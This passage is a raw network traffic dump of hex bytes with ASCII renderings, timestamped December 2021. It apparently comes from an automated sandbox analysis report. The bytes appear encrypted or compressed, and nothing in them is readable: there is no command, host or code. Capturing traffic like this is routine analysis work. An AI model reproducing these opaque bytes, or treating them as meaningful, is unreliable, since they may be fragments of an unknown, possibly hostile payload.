70 c1 f9 7f 27 f5 3c
                      Data Ascii: gGDU7J[5._cuPx'PZk*\glNA},.em25ax<u,}=7@l-?9%<&md&J_1!s%)ckd+s=A1 pWKDf.-G+0xx?p'<
                      2021-12-02 07:33:44 UTC56INData Raw: 2f 96 81 a7 24 d1 24 27 c3 9e 72 87 db b7 28 25 11 53 b2 75 2a 0e cc 64 24 7e 8d 23 8e be 5b 55 08 bf 99 50 f6 06 7c dd e4 33 97 bf 17 64 20 a0 68 aa 2a 22 14 b7 57 cc 07 f9 38 3b 21 25 26 5a 5e 05 50 c3 ac 9e 78 28 19 1a f1 bb 9e 18 7b 3c 3a 77 c0 e5 f2 a8 92 67 11 b9 de 9d 42 c7 d6 79 a5 b1 d8 28 d0 19 44 b1 5e 59 37 0a f8 41 5d 3d b9 ad 1e 64 8f ad cd ee 71 3d 4b 83 4a eb a7 40 44 a3 05 2a 05 ac f1 c0 f6 9a 96 cf 77 b6 89 ee de 58 2b de 69 cf 5d ae 5f 8e b3 ae 24 28 73 8d 39 9b c0 c2 0f 4d 6b 66 ed da 76 e9 1c 62 0e 50 9b e0 44 be a0 c8 3c 34 8e 61 9a e4 67 cb 27 95 3f aa 5f b3 c1 d4 52 9d b5 45 92 06 92 dd ed c2 53 f1 2e a3 31 5f 85 02 43 45 35 6f 5c 49 51 86 ca fd ae 56 95 8c 00 d9 4b 5b 77 f7 43 1b 2d 65 27 48 a6 0c bc 32 c3 d3 72 05 95 82 60 78 70
                      Data Ascii: /$$'r(%Su*d$~#[UP|3d h*"W8;!%&Z^Px({<:wgBy(D^Y7A]=dq=KJ@D*wX+i]_$(s9MkfvbPD<4ag'?_RES.1_CE5o\IQVK[wC-e'H2r`xp
                      2021-12-02 07:33:44 UTC58INData Raw: 60 d1 5a 1f c6 62 44 97 08 ee 4d 90 4b a8 c1 f4 1b d6 90 7c db c7 94 b8 bb d7 16 28 0d c6 3e 96 15 ea ed 2e 8e 17 a7 9f 02 dd f0 de 37 6a e0 2a 64 17 01 ae 4e 13 27 9d 7c d5 b8 46 56 bb 4c 96 bc 92 b8 a9 76 48 44 1b 4e 49 e6 60 75 ae 0b 3e b1 a7 dc dc e2 0a 84 05 b2 ed 15 bc cb 31 d7 56 79 b0 ef b9 32 88 33 30 d5 0e d5 31 79 b7 a8 f6 07 38 70 20 98 20 6f 1b 29 24 a5 57 e4 40 5a ba ec 79 a0 36 3e 6e fe 79 01 f4 c0 7b cc b4 f2 1d c8 35 1c 74 c6 70 7a 5d 6c 3a 56 a2 c4 d2 60 f3 af 3e bd 82 60 ef 23 dd 88 e5 e2 e1 dc d9 cd a5 dd d0 4e 16 af 84 6b 45 13 5f 38 99 d2 c3 86 dc d7 a7 68 d0 61 e9 6d 92 73 a2 c5 cd 0c 72 2f 28 66 76 9c 30 29 73 7d 40 79 79 36 bc 6e c4 2d cb e3 6a 42 ec da b0 11 06 a8 e0 db b1 6b 80 06 d4 d2 24 02 0d f7 aa 91 37 24 d6 f0 2b 56 f1 61
                      Data Ascii: `ZbDMK|(>.7j*dN'|FVLvHDNI`u>1Vy2301y8p o)$W@Zy6>ny{5tpz]l:V`>`#NkE_8hamsr/(fv0)s}@yy6n-jBk$7$+Va
                      2021-12-02 07:33:44 UTC59INData Raw: e6 46 79 32 91 0b 16 1f a4 06 52 ad 1b 70 d5 c6 93 89 c0 06 5c 01 24 e3 07 4f 0c 92 51 2a be ed 42 5d b0 4e a3 fb cc 2b 1b ce e8 83 40 4b c9 62 4a f5 21 2a 04 df 9c 77 b0 0a b8 a3 46 43 1b 7e b9 f7 05 62 1b 97 8b c2 2c 41 ed 6a 7b da 47 13 f8 17 01 42 14 08 fc b5 35 d4 61 09 2d e6 03 60 56 da 5a fa 8e 21 ea 20 ea 9a c6 b2 c6 fb 84 f0 4f e8 af 5b 0a bc a8 d3 b3 9b 92 40 8e 25 61 00 e9 8c f9 92 4a 32 a8 55 f7 f1 dc 64 69 47 74 b3 14 34 6b 74 d7 6e 15 11 fd 3e a9 30 47 cd 45 28 76 7c 0b db 96 a0 74 97 26 57 b0 d1 8c ce 86 2d 99 7c c1 c6 a3 ff d4 72 2c 67 00 e7 1a 85 ec 16 0a 2a 51 ce e6 5b 15 c2 b8 54 9e 6c 27 20 00 a0 6a 30 68 3b 50 47 39 84 ed f7 c1 dd 67 c5 6a 68 53 09 47 00 88 0c 52 98 85 47 b7 d4 75 74 a9 9a 49 6e 9c fe 08 2a f0 df 14 b1 0e f4 6f 7e ec
                      Data Ascii: Fy2Rp\$OQ*B]N+@KbJ!*wFC~b,Aj{GB5a-`VZ! O[@%aJ2UdiGt4ktn>0GE(v|t&W-|r,g*Q[Tl' j0h;PG9gjhSGRGutIn*o~
                      2021-12-02 07:33:44 UTC60INData Raw: 2b ce 3f b2 8d 2b 53 5c c2 13 5f 18 db d2 c3 96 e8 59 50 70 02 07 e3 f4 7a 77 96 ec 20 60 6a 3a 1b 64 df f5 84 77 0e 4d 9e 56 b0 36 bc 7e c4 2d cb c1 54 a1 cd 40 bc c8 1d fd c3 9c a4 df 89 d0 eb 51 18 e1 15 77 45 5d b8 94 e4 fb 1d 5a 11 7f a7 7e 26 9c 9b c7 5c d6 2e 11 04 49 cf af e2 6d e4 d0 07 ff a3 2a 3b 00 61 34 db cc b3 3d fe 65 39 17 21 04 9c 80 4d 26 83 aa d2 3e 92 c2 eb e5 89 16 3b ae 3b 7e 83 86 da 49 3d 7d aa 22 ae 05 22 fb 95 12 c4 cb eb 6c 4e 40 9a e1 67 07 b0 2f b0 99 99 fb 21 6f 5a c7 5f 65 f2 a9 0d 5b 55 00 c7 98 50 b1 06 7c dd 84 33 97 a7 17 64 20 c2 56 49 6d b4 18 6e 64 8b 24 e6 03 6e 0a 20 3d 33 75 16 7c 4b 85 4f 47 ff 19 1a c9 c3 a0 fb 28 97 36 86 d3 7b f9 7e b5 f3 11 b9 e6 c5 42 cb 7a 5a d0 c7 b2 4b 40 19 44 b1 0c 8c 18 c5 ce 20 f1 af
                      Data Ascii: +?+S\_YPpzw `j:dwMV6~-T@QwE]Z~&\.Im*;a4=e9!M&>;;~I=}""lN@g/!oZ_e[UP|3d VImnd$n =3u|KOG(6{~BzZK@D
                      2021-12-02 07:33:44 UTC61INData Raw: 52 1b 3b ca 38 0f 68 11 93 94 2e ff 3c d0 0a fb d0 01 d5 c4 4c d5 5c 20 df 04 e1 13 c1 ee 07 97 5b 4f 99 bd a1 9c 50 ec 0d dd 6d bd e6 2d a4 e6 f9 29 09 cc 26 23 0c db 8f 85 47 6d 95 85 bf e0 a9 92 bd 9c 8c 04 bf a8 83 84 99 57 76 c1 75 9a 20 0a a9 91 a5 0c 4d d7 3c 35 71 44 a4 a5 32 b4 ea 5d de 11 72 62 7c 6c 3c a0 cc 14 18 2a 77 31 43 28 04 d5 3b b3 90 d2 6f a5 39 e2 ae 0b de c9 ea d2 46 8b cf 3d ee 23 52 9e d4 24 44 40 a9 16 6b f0 ad 2d bc ce 97 a4 f9 6c be 44 bf 8f ea 10 c1 1f 14 f6 67 55 22 20 4a 7e 63 b6 db a6 48 7b 5b ad 97 35 a8 72 24 34 ae ff dc ac 32 8a 76 d6 27 44 0e db 09 68 ae b7 93 a4 75 30 91 0d bc ad f8 59 b2 5b fe 3d 17 c6 6c 3c 06 fc 63 58 22 7f a4 21 08 f4 86 4d 40 06 e5 97 ef cc 47 6d da 20 b2 81 df bb 4d 56 13 f8 1d 6f 81 0c b8 31 80
                      Data Ascii: R;8h.<L\ [OPm-)&#GmWvu M<5qD2]rb|l<*w1C(;o9F=#R$D@k-lDgU" J~cH{[5r$42v'Dhu0Y[=l<cX"!M@Gm MVo1
                      2021-12-02 07:33:44 UTC63INData Raw: 81 5b 45 cc d7 e4 7d 98 16 6b ae 9d 99 67 65 56 0e e4 5b ca fa 49 43 02 ea a8 9a d0 af b8 07 45 c7 e4 b1 56 8b 17 d2 fb f6 d6 70 b5 fd cd f9 33 d7 06 da f9 a7 4c 20 60 f4 f4 b7 e2 da d5 6a 56 59 e8 19 2f 7f 4a 85 0e e9 d4 9a dc c0 56 4b 1d b9 c7 9c 5f f6 0e 6c 80 b2 22 5f 40 f4 e4 a7 57 b8 c9 05 a8 f2 80 f1 0a d4 61 60 ce 9f fe 61 b2 4d 22 a6 ee 68 99 92 2f e0 71 b6 2e ff 0c cd 72 86 aa 68 6b 0f d8 95 44 47 5a 53 cd a2 9d 65 5f fe 44 88 14 fe df 34 d7 0b 4f 18 b1 04 9a 03 39 96 4b 2a d1 96 7d 8f 31 20 f3 6d ed eb 37 a8 3e 5d 4d 6c 0b ec 39 47 b4 bc 26 9b 49 fa 33 d3 c1 34 f5 84 08 05 31 40 0f 35 48 ad b5 42 98 ba e2 48 46 c2 8c 5a 75 a9 2e 1e d4 47 0a e9 98 c9 16 7b 6f 8a e4 35 20 0f e0 c7 f6 8a a5 f0 53 be fb 3a 64 ed 38 c8 d1 cf 26 59 36 0b 2c 72 0e 33
                      Data Ascii: [E}kgeV[ICEVp3L `jVY/JVK_l"_@Wa`aM"h/q.rhkDGZSe_D4O9K*}1 m7>]Ml9G&I341@5HBHFZu.G{o5 S:d8&Y6,r3
                      2021-12-02 07:33:44 UTC64INData Raw: 96 51 06 5a c3 05 f1 20 fa 9e 57 4b cf e9 09 b2 2e f8 f4 85 37 09 7e 9d 09 d8 3a 5c 75 32 09 15 0c 4d e2 30 00 8e 5c 6d 91 fb 4b 0e ab 8b 15 1a 9a c2 6c d1 e5 93 f2 cb 88 36 bb cf 28 63 e6 a3 4b da ea de e8 25 e6 13 5c 4b 6c 81 99 ef 31 80 c1 10 38 1c 13 33 ee 09 b1 6c b1 6e 82 21 23 2e 4b ec 46 88 34 ef 16 a4 bc 09 96 eb ff 1e a3 1e 46 ae 1c 8a 4b 66 42 52 3c 4c f4 f3 66 4b 73 a4 37 b8 cf d6 73 99 a9 f8 b0 37 9c c1 fa 0f c5 82 d3 3d 46 b9 c9 e5 7d 4e 8a 29 1c ac e1 c1 27 a3 d3 99 7b 87 09 82 aa 9e 2c 14 de 27 16 d0 86 72 b4 24 9b a2 5c 20 88 1f e8 15 6e 5b 60 62 57 2b 45 33 40 b1 84 da c1 ed 64 65 7d 27 f4 af 59 ee d7 db 80 77 c6 dc 2b 8f 7c d6 91 8d 09 90 c1 1e 26 a4 e9 b8 4e 19 db 43 7f 76 45 39 74 f1 5d 4b 49 0d 7e 7b 94 be f0 6e 0c d9 64 1a 98 22 93
                      Data Ascii: QZ WK.7~:\u2M0\mKl6(cK%\Kl183ln!#.KF4FKfBR<LfKs7s7=F}N)'{,'r$\ n[`bW+E3@de}'Yw+|&NCvE9t]KI~{nd"
                      2021-12-02 07:33:44 UTC65INData Raw: ca a7 74 6e 0f 6e 32 2b a3 de 8b 43 10 cb 95 f2 f5 0a c8 ee 62 51 8a e1 34 9d 5f ac d5 43 1b fd 2a 4a 1f 98 34 e0 30 3c d3 18 bb d2 64 ae 78 bc 49 78 ab e3 ab d8 af dd ed 57 cb 7d 3e 30 bf 81 11 1a 0a 7a 8f c9 54 df 9e 17 43 1f 98 f7 7a 0f 16 31 7a 16 40 f9 ab 33 86 f1 3e 78 61 81 63 ca 82 3d 39 de e5 05 c5 78 7c f1 dc 06 21 ac 99 23 6e ad 02 72 61 b6 fd 77 8a 06 d3 ea ba 58 bb 9f 88 04 d0 29 87 ed c0 68 31 e3 c7 2e 73 8a c7 d9 0e 83 54 8f 79 44 c5 21 50 92 fd f0 a4 a2 5b 62 24 ed be 0f 4d 5b df 72 11 55 15 43 93 93 02 a0 c6 d8 f5 d7 eb 7f eb a4 df 6d c1 06 51 65 28 ca 29 3a 45 8a 8b a0 b7 ad 32 7f b1 c0 b8 34 57 11 09 e6 be 4a d6 94 60 78 81 59 13 ba 29 df e0 07 a4 3c 6f bb 78 3c f7 01 f9 ad 51 2a 37 9d 03 bc dc 44 68 f8 9e d0 6c 08 a4 36 15 df 47 cc a1
                      Data Ascii: tnn2+CbQ4_C*J40<dxIxW}>0zTCz1z@3>xac=9x|!#nrawX)h1.sTyD!P[b$M[rUCmQe():E24WJ`xY)<ox<Q*7Dhl6G
                      2021-12-02 07:33:44 UTC66INData Raw: 04 27 e9 81 72 bd cf 6f c2 07 fb 3d 0c d3 f1 6b b8 5c ac 66 89 49 f6 2d fa 2a ee 19 bb dd 85 86 e0 aa 4d c6 1c 9d b7 3d 2f bd 4a 3d b8 ac bb f6 3e 06 78 64 a2 2a 6d 53 11 d8 3e 6c 5f 60 95 08 ca 7a 93 23 0a ca ac 95 3f 49 db fd 41 ec e2 31 b2 f3 6d ee 2b be a5 05 55 f1 90 a3 fb b0 c0 6f c3 24 c6 d8 5d 49 f7 72 8f 6e 10 f7 a9 d6 0f 15 cb 70 a2 23 bd e4 81 ee 7a 87 8a 1b 57 a7 3d d3 be c9 62 f6 9f 40 c6 c8 b5 94 42 eb 83 6c b3 77 11 42 08 2d 4e 17 c9 43 52 cd 97 27 b5 ea 20 64 7a 4f f7 a1 e6 8d 37 ca 8c 01 29 b0 7c b0 b6 ca 99 39 3d a5 25 59 b0 95 8b 4f 6d e5 9a 08 59 46 8b cf f0 96 d2 39 c0 a3 49 38 08 6e 90 02 88 07 8d 72 2a 80 22 b0 29 fc 7f bc 67 4e 7d fa 12 36 fd 38 d1 33 8a 06 45 34 f9 57 39 0f ff d9 e6 d5 2e c7 8a 5b 0d ec 16 60 ed 7f eb 77 21 24 a9
                      Data Ascii: 'ro=k\fI-*M=/J=>xd*mS>l_`z#?IA1m+Uo$]Irnp#zW=b@BlwB-NCR' dzO7)|9=%YOmYF9I8nr*")gN}683E4W9.[`w!$
                      2021-12-02 07:33:44 UTC67INData Raw: 52 8c fc ef d2 99 77 f4 3e a2 03 00 5f d4 29 de 98 15 05 e8 be 74 f4 b2 7e 25 d0 8d c2 62 ae 86 4d bb 00 37 ae 2f 6e cf e2 d5 3f ab 83 a6 22 2d 84 6c c7 59 b8 50 98 cc 3e fd c6 07 36 5d bd 34 d5 2b ba 90 b1 ce cf 20 3f 89 7a b8 f5 e8 e8 9e c4 81 ba 46 e9 ac 28 65 06 b2 a6 46 1f 61 2b af 6a 5f 2f d6 36 63 f4 05 aa 92 d5 4f 7b 8b 44 e4 25 a5 15 b9 56 87 cd 3c f0 7e 80 e7 b2 23 d4 66 b8 a8 12 cf a8 65 c5 a8 27 26 fa 83 4a 73 25 9d 75 e7 0c 6a 74 c8 0a b4 b6 0d 7e 53 f4 96 7d 0b ad ad d6 af 75 5e e7 3e fa 1d c9 9b 97 2b 44 da f5 07 12 8c a0 4a 41 5b a0 8e 75 47 0a 90 5e 68 ba b6 98 f7 b2 ad d9 a4 5d 21 68 3c e8 6a 7a 90 4f 7b 85 b3 1d bd c2 61 d4 16 a9 4a 22 3c 1e 4c 14 7d 93 93 ee 57 08 5f 41 fb 00 60 f5 98 9f 2e 05 9a 27 12 b2 06 f1 f0 d4 a3 7a bf c3 3e 60
                      Data Ascii: Rw>_)t~%bM7/n?"-lYP>6]4+ ?zF(eFa+j_/6cO{D%V<~#fe'&Js%ujt~S}u^>+DJA[uG^h]!h<jzO{aJ"<L}W_A`.'z>`
                      2021-12-02 07:33:44 UTC69INData Raw: 86 9b 6d d7 54 a0 df 35 95 ec a9 92 c1 f1 80 53 45 16 63 cd 3c a6 99 67 07 19 a9 da 61 1b f5 44 75 29 a3 0d b8 58 cf 27 8a f5 1c b7 87 af 32 13 2b 03 c7 2e 20 1b aa 82 a6 83 54 e6 8d f4 6a 3e f4 53 ec 5c d2 af ef 01 3b d5 c4 30 91 d9 d8 df 04 ed 13 c7 72 07 17 6b 1d 27 42 d5 77 3b aa 60 a7 49 31 a6 98 2d a3 0d 27 8b 44 f8 33 80 c3 97 7a eb dc fa 66 34 57 19 8d e2 73 72 27 79 16 fa 92 5b 12 6a 7a 65 95 aa 5c f0 6f 0c b6 80 dc 70 78 41 fc 3d e2 32 b4 46 5d d6 15 41 e8 62 63 06 0b f9 5e d3 4a 2c 4d 37 92 0f e0 84 c5 a0 d2 ab d5 c1 6a 37 80 4b 0b 0b 6a dd 58 e3 ce 26 df 26 48 d0 2a 29 55 86 aa 1f e3 b9 4a 27 55 38 9d 11 e5 0d 30 63 8f 60 b7 c1 8b 1a f6 67 55 26 cc 16 8e f3 00 8b aa 3c 61 85 aa d6 35 b4 a7 9b 80 d3 fd 4b bb 68 01 bd bd bd d3 da ea 60 bf a7 5e
                      Data Ascii: mT5SEc<gaDu)X'2+. Tj>S\;0rk'Bw;`I1-'D3zf4Wsr'y[jze\opxA=2F]Abc^J,M7j7KjX&&H*)UJ'U80c`gU&<a5Kh`^
                      2021-12-02 07:33:44 UTC70INData Raw: 7c 55 ae 8f 72 62 80 a2 fe ba 66 85 02 be 90 f8 b5 25 7d f4 df 89 7d ad 3c ec 9a 90 48 fd 9d d6 9f 9b 08 b7 48 4b 9e a1 10 8e ec 5c c2 67 d0 17 9f 2b de db 3a b0 91 bd 06 90 d2 af 54 0a 67 e9 1e 11 40 81 05 38 49 f1 dc dc 2a 62 c1 77 fa 37 8f 50 fb bb e5 5b 52 3a c7 da de 49 d3 21 49 89 e7 8b 0b 10 a0 35 33 a3 a7 72 64 60 c9 79 a5 88 cf 5c 12 e6 49 c1 06 a6 7d 4f 90 18 45 32 0b 23 10 7e e9 fb 41 3a 4d 46 52 c4 93 43 ac d3 ee 71 3d 4b 83 4a 8f 39 fe 2d a6 6d f2 74 92 0e d7 68 8f 29 ce 21 dc 0f 25 ee 26 23 de d6 96 6f 79 1f d8 b3 90 74 22 b5 cc d1 28 b4 55 60 a0 2b 31 53 78 95 9b 5d e1 22 ab dd df fb 8a 62 cc 3c 0b 55 1b d6 a5 8f c9 fa ed 81 c0 0c b3 c1 41 65 a6 26 0d 2c 0e ac ff ed 94 38 97 7d 5c 04 60 16 4b 29 ad 14 7a a2 e0 e0 21 19 a2 ee 8b 92 e9 b8 f5
                      Data Ascii: |Urbf%}}<HHK\g+:Tg@8I*bw7P[R:I!I53rd`y\I}OE2#~A:MFRCq=KJ9-mth)!%&#oyt"(U`+1Sx]"b<UAe&,8}\`K)z!
                      2021-12-02 07:33:44 UTC71INData Raw: a5 f4 c1 51 e7 e3 6c b1 79 d2 d3 08 61 01 fa 55 d1 3c 1d 17 50 e3 f2 01 32 e0 ba 36 64 f5 70 aa d2 e7 6e 57 2a 70 60 d1 4d 35 06 09 70 e5 a0 cf ea 27 a3 82 9b 02 b6 96 f9 5b a6 42 0d f1 20 17 be 57 4b c7 f5 92 2b fd 28 a4 1d a7 8f 2a a4 5f dc b8 11 68 58 7a 18 8e a4 8f a5 b2 6b 11 38 6b 5c 54 6f a6 89 b6 3e b1 b0 e2 3f c6 de 55 2a 3f d3 f6 9a 15 e0 f8 d6 47 53 c5 65 dd 44 9e e8 04 21 4b 0f 9a 9c 0e 27 28 87 77 20 87 20 6f 2b 77 1a 46 5a 3e 97 75 31 d2 9a 98 e4 d1 a2 53 eb 3d 17 a5 e7 76 31 60 2b 27 f9 91 d2 21 7b cc 84 47 05 6d f9 ef 97 6c 4d a6 d1 49 11 d4 3e 3c 73 88 e5 ea d7 e2 3a fd 27 32 1c e3 a0 a3 7e 50 38 28 66 23 e6 e9 8e 90 4a 63 bf a4 8d bd 31 c3 ea 4a 75 c3 98 b2 45 85 1b 64 e7 d9 ba 94 5d cb 48 79 3f 08 5f 60 46 fb e8 a6 47 e6 d6 0d 8f 91 06
                      Data Ascii: QlyaU<P26dpnW*p`M5p'[B WK+(*_hXzk8k\To>?U*?GSeD!K'(w o+wFZ>u1S=v1`+'!{GmlMI><s:'2~P8(f#Jc1JuEd]Hy?_`FG
                      2021-12-02 07:33:44 UTC72INData Raw: 13 05 00 9b df 0f b9 61 52 ae 99 6b a7 4d 40 69 d1 9c e0 12 18 96 be f1 8d 79 32 91 57 c7 00 38 88 9b 9e 1c d7 1c 30 35 aa 8d 39 50 84 d1 54 31 2a 85 d7 10 73 d4 84 9c ba 5e 37 36 76 55 f5 0e 97 f5 29 7f f9 dc 7c d3 83 e7 34 50 3c 85 ed bc 8f 69 7f 99 14 7d f7 ab 9e 18 a4 b2 b4 fa 86 ca 19 87 42 90 16 c2 a9 48 2d e2 f0 33 e5 ad 75 52 a7 57 a7 b4 38 16 1d 20 da 5b 74 4e 0e e7 52 24 b6 1a a7 0f 1e c0 04 29 e1 82 2a 1f 1a 71 4e 50 97 e4 ea 38 43 17 40 9d 13 39 e7 29 a4 c9 ad 6d 68 aa 5b 87 c5 c0 ed eb 01 7c 49 86 31 a3 fc 6f 9c 95 0f cc 4b c7 3b 43 d3 a2 b9 68 0a 65 fd a1 65 4e 6b 93 15 28 07 95 f5 ee 25 a8 6a 95 b8 bf 59 66 86 1e 16 4b 83 01 4c b2 8a 58 fc 4a 24 1a 77 fb db 7c 11 99 d6 7c 32 8e 9e c9 31 2b 9c 7a f8 4b 44 b8 68 63 55 c6 9a e2 1f 54 bd f9 a9
                      Data Ascii: aRkM@iy2W8059PT1*s^76vU)|4P<i}BH-3uRW8 [tNR$)*qNP8C@9)mh[|I1oK;CheeNk(%jYfKLXJ$w||21+zKDhcUT
                      2021-12-02 07:33:44 UTC74INData Raw: b7 c1 f4 8f 5d 04 5f 40 af 3e 55 06 f9 99 a9 61 67 f9 d3 fe 45 af c2 2b da 3f b2 7d bd f2 c9 4e 2d bc 28 09 3d 0f 49 78 55 8a 4b 59 24 ee f1 f4 49 9a 17 03 61 49 65 e0 b1 65 e0 23 7b a9 a6 71 ec a3 91 b0 94 2f ca 71 d0 cd 4e 39 09 ac be 9f de c3 9c 54 79 10 a6 41 d7 f7 f5 1a 6e dc 2b 83 f5 29 ef 8d c3 67 5c de 7b cc 9c 74 03 9f 7c 1c 03 eb 85 7c 16 7a 57 dd ef e4 d4 39 2e 3b 3c 57 db 17 0f 1f 31 04 43 ab 2d ce d8 23 fa 8c 77 ef cc d8 bf 06 c5 df cb 64 7a 23 f1 36 9f 01 61 bf a4 a3 4e 6a 17 71 17 ee b8 44 05 2d f2 08 60 a0 91 a5 29 58 e4 9c e9 63 b6 67 fb 21 43 5a c7 5f 25 f2 a9 0f 5b 55 00 87 a6 b3 95 f0 93 11 5b c9 a4 a1 14 b5 0f 17 68 aa 1a 38 2a 58 8b 47 b9 43 a5 8d 33 ca d2 ff e2 d4 4f 40 ac 9e 68 2e 27 f9 e9 3b 71 d4 e2 94 3a 77 c8 fb fe 63 87 f9 fe
                      Data Ascii: ]_@>UagE+?}N-(=IxUKY$IaIee#{q/qN9TyAn+)g\{t||zW9.;<W1C-#wdz#6aNjqD-`)Xcg!CZ_%[U[h8*XGC3O@h.';q:wc
                      2021-12-02 07:33:44 UTC75INData Raw: 62 80 5d a5 b8 24 80 e3 5d df a7 06 34 52 c2 68 97 58 4c cb 2e 8e 17 ea 1f 16 ab 38 c5 08 1c af d5 d1 75 07 b3 38 0a e9 60 a9 ff c3 ed 67 75 dd ad 4e ad 5f 2f 0a f7 2a 3e eb 7d b7 0a b8 6e 6c 44 19 7b 36 67 7a 90 f2 eb 90 3d b5 01 ed f9 e7 92 24 2b ef ba 20 fc fc 72 29 83 89 39 68 76 77 18 53 af 9c 34 1c 0f da b2 25 f6 70 0b 7b a6 c5 2f 9a 71 b3 4b 35 4f cc d2 e9 ce f3 b0 49 10 f1 a1 43 59 72 e4 c3 95 da 54 03 a6 b6 48 8f 02 7b 2f 5b 9b 1f 0c 43 f3 ec 31 52 bd 6d 82 fd 28 ac 83 40 5b c1 eb f2 01 3b b8 ba 36 6c c1 31 72 e7 c6 ca 82 1d 60 eb d8 7f 36 3a 19 70 9c dc cf ea c6 5b b1 c2 78 3c ea 2e 39 2a 86 58 0e 37 31 ae 2d 74 31 25 62 1b 34 82 d0 a6 cc 04 74 08 f6 d2 8b 07 f0 6d 57 1d b9 3b 3c 96 f5 f2 67 24 4c f3 0d f9 bb 68 90 7f 8c 91 7b c3 8f cf 05 bd 19
                      Data Ascii: b]$]4RhXL.8u8`guN_/*>}nlD{6gz=$+ r)9hvwS4%p{/qK5OICYrTH{/[C1Rm(@[;6l1r`6:p[x<.9*X71-t1%b4tmW;<g$Lh{
                      2021-12-02 07:33:44 UTC76INData Raw: 90 e7 20 38 fe 19 86 c2 4c 20 44 f4 23 de 59 7b f1 81 a3 2b 3c 31 23 ba da 8d c2 89 0a f7 ce e9 bb 78 0b 05 c5 9a 23 f6 dc 2a e6 9a 19 fd fd 9e 8f 10 1f 74 65 1a 3f f8 83 60 d8 22 94 3b 33 80 6c f9 a1 10 ea 10 33 a3 7d 49 01 7f 28 20 ea 8b d8 cd 71 e5 5e 06 b7 9e dd 46 f3 65 22 0e a1 2b 38 24 de 57 56 ab 77 46 d8 95 48 23 d0 6c 4a 71 28 4f 19 99 4a c0 2c ed a3 05 c2 a0 84 3d e4 cf c8 41 7b 50 35 e1 1e 5a 7d 69 21 c1 1b 3b 11 1f be e5 c6 e3 2f 22 de 87 bd 65 b6 08 a2 95 45 c7 e1 d5 f3 e8 45 65 73 bd f7 00 df 5e 60 00 1c 86 12 eb e4 8f 89 27 72 93 96 a0 09 4a f3 e2 2a 38 4e f8 ee d4 cb fd 3d a5 39 39 0a ec 97 82 b4 bc 2e 87 04 26 76 7c a7 60 a2 11 7d 4e 26 fe 21 99 e1 cf 7d bd e4 81 6d be 54 fd 1c 82 23 ab 4b 5e 92 e4 a6 77 f7 48 ef b4 03 bd 6b 83 24 52 b0
                      Data Ascii: 8L D#Y{+<1#x#*te?`";3l3}I( q^Fe"+8$WVwFH#lJq(OJ,=A{P5Z}i!;/"eEEes^`'rJ*8N=99.&v|`}N&!}mT#K^wHk$R
                      2021-12-02 07:33:44 UTC77INData Raw: f8 96 1a 44 bf 27 77 a0 1d 36 b0 60 58 3e e5 30 15 ee 7f 15 d2 fd 28 d5 51 86 e7 91 bb 0e 43 98 a1 2d 42 30 0e e2 ca b6 3c 2f c2 e4 33 14 ed 61 13 5a 75 30 62 59 10 0c 42 ed 30 00 8e 5c 61 42 c4 31 82 d1 1c 2a 98 b1 c2 6c 50 bf 93 f2 2a 50 5d e8 cf ad b8 cb e9 c8 c2 7f 20 44 a7 db be d5 5b 3f 69 4a 52 bb 83 0c 5d 5d b6 69 b9 92 59 8e 94 6e 2f 7d 36 46 cd 42 1c 48 7b 49 d4 f9 72 8f ef 85 7e 00 2d 5d 38 a6 54 d0 8a b4 ca f3 52 54 80 cb 2b 29 be 68 e5 cd b7 95 df ea e7 ba 9f ef 6c af 52 52 9e 8c be 44 d2 e3 7d 12 02 b2 af 74 d6 45 39 5c 00 d9 20 3f 52 dd 59 14 92 2c 68 58 e8 f4 5c 01 d6 f8 82 12 13 5a 20 44 a5 eb 62 00 b4 57 c6 1d a2 f7 66 14 32 d7 4f dd e9 81 89 cd a5 15 e9 56 50 91 be b1 7e e5 e5 a1 dc 2b 1a 2b d6 91 22 d4 59 c5 a9 d9 1b 77 78 26 e7 db 89
                      Data Ascii: D'w6`X>0(QC-B0</3aZu0bYB0\aB1*lP*P] D[?iJR]]iYn/}6FBH{Ir~-]8TRT+)hlRRD}tE9\ ?RY,hX\Z DbWf2OVP~++"Ywx&
                      2021-12-02 07:33:44 UTC79INData Raw: dd c9 50 a2 87 75 54 e3 85 3c 2b fe 44 d4 13 d2 1b e4 2b 15 d5 41 66 1a 89 b0 b5 28 12 64 16 4b 10 45 38 eb 5d 49 5f 4a 7f 5e bd e0 18 22 75 ca 49 73 3f f2 7d 90 bd b1 21 1e 45 39 8f b0 96 a7 ad 6e 47 fa 9f f3 48 9b 0e 63 1e 07 7e 6d 38 4f c1 92 ab 10 b9 53 b8 98 f6 8b fe ef 48 15 df 09 ea 58 f7 5e 7b 2c d6 b0 97 5c 3e b2 35 f8 62 03 31 62 3b f4 2d 9e 35 2e 23 e7 a1 1a 05 c5 0c 7d f1 dc 0a 69 2d 75 8e f1 59 bc 4a 1b 8e 01 88 75 c6 56 5a 47 2e d9 0f ff 7f 0b 29 87 bd c1 68 31 01 c7 2e 73 8a c7 89 0f 83 54 c2 f0 00 e1 21 50 c2 fc f0 a4 f1 13 e9 60 ed be 3f 4c 5b df 19 41 1d 9e 43 93 a3 03 a0 c6 88 bd 5e af 7f eb 94 de 6d c1 2e 31 2d a3 ca 29 0a 44 8a 8b ed 93 fd 7a 7f b1 10 b8 34 57 cb 49 ee f6 4a d6 44 60 78 81 82 57 9e 41 df e0 d7 a4 3c 6f fb f3 78 d3 01
                      Data Ascii: PuT<+D+Af(dKE8]I_J^"uIs?}!E9nGHc~m8OSHX^{,\>5b1b;-5.#}i-uYJuVZG.)h1.sT!P`?L[AC^m.1-)Dz4WIJD`xWA<ox
                      2021-12-02 07:33:44 UTC80INData Raw: 8b 29 ba 17 6f 0a cb e7 ba 6d d3 2f 9e 1c af df 2c 3b 1b fe 17 d0 13 37 19 da 1f 1b 98 9c d5 e8 ec 61 99 96 1d 65 21 4e d1 cd d7 13 72 9a 41 a7 a4 61 eb 16 fe 5c aa fe b1 b9 ed a8 6f dc 2b f4 7a fd 91 b5 b9 54 c4 a8 d9 6c 0e bd 4e de a1 a6 89 72 f3 3c 6b 62 3d 73 33 5a 44 a0 58 af bc 70 52 95 04 9f a5 88 e7 d6 9c e8 51 a1 ed 08 e3 7c 55 41 fe df 9d 72 3b e2 0d 99 92 f0 01 2f 07 f1 64 d9 83 55 8e 99 a7 08 de 0a fd 5f 53 9d d6 6c ec b0 bd f9 e8 25 b7 c6 23 cd 4f 0b 22 fb cb ea 15 55 3c 33 c9 9c 45 90 45 ce 26 9f 0a 70 e5 2b fd 0c f4 15 9b a9 f1 4e aa ae 72 f9 87 fe 9f 8f 9a c8 b6 ec 5b 7d bd 8c da de 35 5b 2b 8d 